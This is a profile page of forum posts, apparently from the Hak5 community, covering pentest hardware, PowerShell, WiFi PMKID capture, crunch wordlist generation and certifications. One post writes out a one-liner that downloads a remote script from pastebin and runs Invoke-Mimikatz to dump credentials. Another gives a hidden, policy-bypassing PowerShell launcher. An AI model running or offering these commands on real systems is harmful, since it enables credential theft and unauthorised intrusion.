
PoSHMagiC0de

Dedicated Members
  • Posts: 618
  • Days Won: 26

Posts posted by PoSHMagiC0de

  1. We are going to need a VM to compile this and redistribute it onto the Bunny.  You can get the compilation going by installing build-essential with aptitude, but the Bunny chokes on the compilation at different parts at different times.  It cannot handle it.  If you want to continue to try, then apt install build-essential while internet sharing and try the pip install -r requirements.txt again to see if it compiles.  You will also need to pip install --upgrade setuptools to get rid of another error.

    I gave up when I saw it was compiling, as I know any compilation I did on the Bunny that pushed it usually locks it up.

     

  2. Wait, you are launching PowerShell from within PowerShell?  If you are, that is your issue.  Depending on what you are trying to do, you will have to do it differently.

    If run from the command line, that will work.  But if within PowerShell, then the below will need to be done.

    Start-Process "PowerShell" -ArgumentList "/C `"IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/FvASwLVQ');Invoke-Mimikatz -DumpCreds`""

    But if you are already in PowerShell, I do not see the need for the above.

  3. You can, or you can SSH into it and work on the command line if you are l33t enough.  It has an internal web interface on the Pineapple.  It is not served from their site.  I believe the dashboard does connect to their portal, but just to pull down news.

  4. Yeah.....

    I read through this thread twice and still got lost.  If I read it correctly, the original question asked why Hak5 products are tied to their servers.  Well, they are not.  The Bash Bunny, Rubber Ducky, and all their stuff do not require you to talk back to their server.  If you want new firmware and such, you can download and install it, but usage does not require, nor does it involve, talking back to Hak5.  The Cloud C2 might, and if it does, it will be for product registration, since that is one of their only products that has a free and a paid tier, so it has licenses.

    So, I do not know of any Hak5 hardware that has a mandatory umbilical back to them.  The support you get is all manual: manually calling/emailing them and manually downloading and installing updates.  Hmm, I think the Pineapple speaks back to their server, but only to check whether there are updates, and I believe there is an option to turn that off.

  5. I parsed through the Go code for Bettercap real quick and see there is no output except to the console for GPS data.  Not even a REST API for it; otherwise I would suggest building a service in whatever language you want that hits the REST API of Bettercap to query that data on a time interval.  For something like this, Kismet might be a better choice.  Set up Kismet as a sensor on your remote devices that can communicate with a Kismet instance that is the server.  Though I wouldn't shoot that openly across the internet.  Maybe create VPN or SSH tunnels back to the server and serve it through there?  Have the Kismet listener listening on localhost only for the SSH tunnel, or on the private VPN network for the VPN tunnel.  You get it.

  6. Hey Mubix,

     

    When you are back, you should do a show on using Metasploit to get into an AD domain machine, delivering Empire for post-exploitation, or delivering Empire as a payload for Metasploit's initial exploit.  Use BloodHoundAD to find a way to elevate somewhere and then initiate the elevation.

    That should keep the questions rolling in for a bit.

  7. Soooo @Darren Kitchen

    I was going to send you a solution, but YouTube comment space is too small for what I was posting, and you do not take PMs here.  Totally understandable. 😛

    Actually, I wanted to post it silently, because if I win and the prize is a BB, I already have one and would rather the second runner-up get it.  I just like solving the problem.  🙂

    Now, if you want to start a Hak5 credit account for me so I can earn up to the amount I need to get a Tetra, well I am down heheh.

     

    How do I send you a solution silently?

     

  8. You can also get a VPS like DigitalOcean (Bithost is the same thing but with Bitcoin) and use the road warrior script to set up a quick SSL VPN of your own before heading out, and then use that with OpenVPN to hide your traffic.

     

  9. One thing I have done with crunch, as an experiment in targeted wordlist generation, is to take a sample wordlist of a target.  From that, get a list of all the unique characters in the list (to prevent repetition we do not need and that will not make sense).  I then choose a minimum word size and a maximum word size I think the word or phrase will be.  I make sure to include a space in the character list so phrases can be generated.  From that, you can generate smaller wordlists with crunch, using only characters from words you think make up their password.
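The procedure in the post above, as an added worked example (my code, not the poster's): reduce a sample of target-specific words to their unique characters (plus a space for phrases), pick a length range, size the keyspace, and either enumerate candidates in Python or emit the equivalent crunch command line. The sample words are constructed for the demo; the output file name is an assumed default.

```python
import shlex
from itertools import product
from typing import Iterable, Iterator

# Added example of targeted wordlist generation:
# 1. take words gathered about the target (constructed sample below),
# 2. reduce them to their set of unique characters, plus a space for phrases,
# 3. pick a minimum and maximum length,
# 4. enumerate every string over that charset in that length range,
#    which is what `crunch MIN MAX CHARSET` does.


def charset_from_sample(words: Iterable[str], include_space: bool = True) -> str:
    """Unique characters seen in the sample, sorted so the charset is reproducible."""
    chars = set()
    for word in words:
        chars.update(word.strip("\r\n"))
    if include_space:
        chars.add(" ")
    return "".join(sorted(chars))


def keyspace_size(charset: str, min_len: int, max_len: int) -> int:
    """Number of candidates crunch would emit; check this before writing the file."""
    n = len(charset)
    return sum(n ** k for k in range(min_len, max_len + 1))


def generate(charset: str, min_len: int, max_len: int) -> Iterator[str]:
    """Pure-Python equivalent of crunch's enumeration, shortest candidates first."""
    for k in range(min_len, max_len + 1):
        for combo in product(charset, repeat=k):
            yield "".join(combo)


def crunch_command(charset: str, min_len: int, max_len: int, out: str = "targeted.txt") -> str:
    """The crunch invocation for the same charset and lengths, quoted for the shell."""
    return "crunch {} {} {} -o {}".format(min_len, max_len, shlex.quote(charset), shlex.quote(out))


# Constructed sample (hypothetical): a pet name, a year and a team.
SAMPLE_WORDS = ["Fluffy", "2019", "Red Sox"]

if __name__ == "__main__":
    cs = charset_from_sample(SAMPLE_WORDS)
    print(repr(cs), len(cs), "characters")
    for lo, hi in ((4, 6), (8, 10)):
        print(lo, hi, keyspace_size(cs, lo, hi), "candidates")
    print(crunch_command(cs, 8, 10))
```

The size check is the part worth keeping: even 16 characters at lengths 8 to 10 is over a trillion candidates, so the charset trimming only pays off when the length window is tight or when the list is fed to a rule-based or mask attack rather than written to disk in full.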

     

  10. Hey,

     

    Anyone tried out Go yet?  Watched an 8-hour YouTube video on it (not all at once, of course) and have been messing with it for almost a month.  I like it.  I like C but hate the tediousness of it sometimes if you want to do something simple.  I like dynamic languages like Python that make it easy to do a lot of things without thinking too hard, but hate that it doesn't have strict typing when I want it at runtime, unless I implement my own methods of ensuring it.

    Go gives me both, and the simple concept of concurrency in it is a plus, because we all love trying to handle sharing data among threads.  🙂

    Who else has given this language a "Go"?

    See what I did there?  😛

     

  11. Try this:

    powershell -NoP -NonI -W Hidden -Exec Bypass -C "$u=(gwmi win32_volume -Filter {Label='PD'}).Name;cd $u;.\d.cmd;"
    

    You passed the name already.  No need to reference it in the variable.  Surprised it even works in your standalone tests, unless you are already in the folder with the d.cmd file.

    Also, to remove the extra (") that might be terminating the string, you can use "{}" for the filter statement in PowerShell.

     

  12. hcxdumptool doesn't quit when it has the PMKID, plus there is one more tool needed to convert what hcxdumptool gets into a hashcat-crackable formatted hash.

    I looked into automating this, but it is not so simple.  I have been messing with scapy and 802.11, and it may be possible to automate this in Python.

    You will need to set up a channel-hopping beacon capture part to get access points.  You will need to set up a thread after that to handle association with scapy and monitor it once APs are found.  You will need a thread to begin authentication but not finish it.  The PMKID is usually sent when the AP sends its ANonce.  You will just need to figure out how to create the 16800 hash that hashcat can understand, to pass it to hashcat.  I have been busy with a talk for a DevFest that happened here, but am free now and might look into this.  It may be possible, though, depending on whether you can get association and all that working.  You could try aireplay-ng for the association, but it doesn't return anything to let you know if it is associated (no error codes or such).  If the AP is MAC filtering, then this can be an issue.

  13. Looks like we are going to have to start rolling our own crypto or use older, "non-backdoored" versions.

    Governments always want to look at people's nudie pics and porno behind their backs.  Tell them to go find their own porno.  Perverted gov agents.

  14. I am leaning the direction of @barry99705

     

    I was the type to push everyone toward college back in the day, but now I have been more picky as to when you need to spend half your life on a student loan if you do not have to.  School versus payoff these days has gotten tough when it comes to loans, so I always try to steer people away from them if they can attain the knowledge just as well by other means, but that is just my background when it comes to education these days.  Though I still believe in obtaining knowledge.

    Now, with that.  My job put me through the CEHv9 course.  I have practice exams, and from people who paid to take the test for the cert and from the practice exams, I lost interest in a CEH cert.  Nothing to do with the difficulty of the test.  It doesn't seem hard.  It was just the content of the tests and those wacky throw-ins (which are in the practice too) that made it feel like the industry tried to standardize hacking.  It was watered down and made me feel someone with no real-world experience can get one of these and be mistaken for a security expert, like an MCSE :tongue:.  If you want a cert, aim for the OSCP if you have to spend money on a qualification.  From what I have seen of it, it shows real-world knowledge, and you can even learn from it if you fail, versus a CEH, where failing means you have to go memorize more stuff.

    I am not knocking those who already have the CEH cert.  Even I was going down that path to have a piece of paper to satisfy some industry goons.  Ultimately, I am settling on getting OSCP-type certs, as they have shown that to attain them you have to show some sort of real-world competence in the field.  I say "hack" together your own learning and education path.

     

  15. Tried it, it works.  Better if you use the parameters --filtermode=2 --filterlist=<text file with the BSSIDs you are targeting>

    Else it goes after every beacon it hears.  You also have to manually break when you see the status say pownd=1, as it means it has gotten a PMKID.

     

    Have to check if there is a param to quit after one PMKID is captured, for automation.

  16. Maybe a yagi and a wifi amp?

     

    I built myself a couple of cantennas from stainless steel toilet brush holders and mounted them on tripods.  Good range directionally.  I am waiting for a 3000 mW 35 dB amp to come in this week to see if I can make it go even further.

    For extreme ranges you will need a directional antenna, which seems to work well, and maybe an amp if you want to get more.

     

    Heck, on Amazon you can get some huge WiFi amps and a parabolic dish if you are that serious.
